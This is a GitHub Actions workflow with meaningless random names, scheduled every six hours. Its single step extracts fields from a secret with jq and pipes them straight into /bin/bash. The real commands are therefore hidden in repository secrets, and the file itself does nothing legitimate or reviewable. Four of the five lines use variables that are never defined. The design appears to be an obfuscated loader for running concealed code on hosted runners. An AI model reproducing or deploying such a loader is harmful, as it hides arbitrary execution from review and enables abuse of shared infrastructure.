name: yandfjih

on:
  workflow_dispatch:
  schedule:
    - cron: '0 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yandfjih
        env:
          oobri9895: ${{ secrets.oobri9895 }}
        run: |
          echo $oobri9895 | jq -r .kz650 | /bin/bash
          echo $hw17 | jq -r .b1323 | /bin/bash
          echo $hh876 | jq -r .xatur25281 | /bin/bash
          echo $a374 | jq -r .qw0 | /bin/bash
          echo $myssk427 | jq -r .dou97480 | /bin/bash

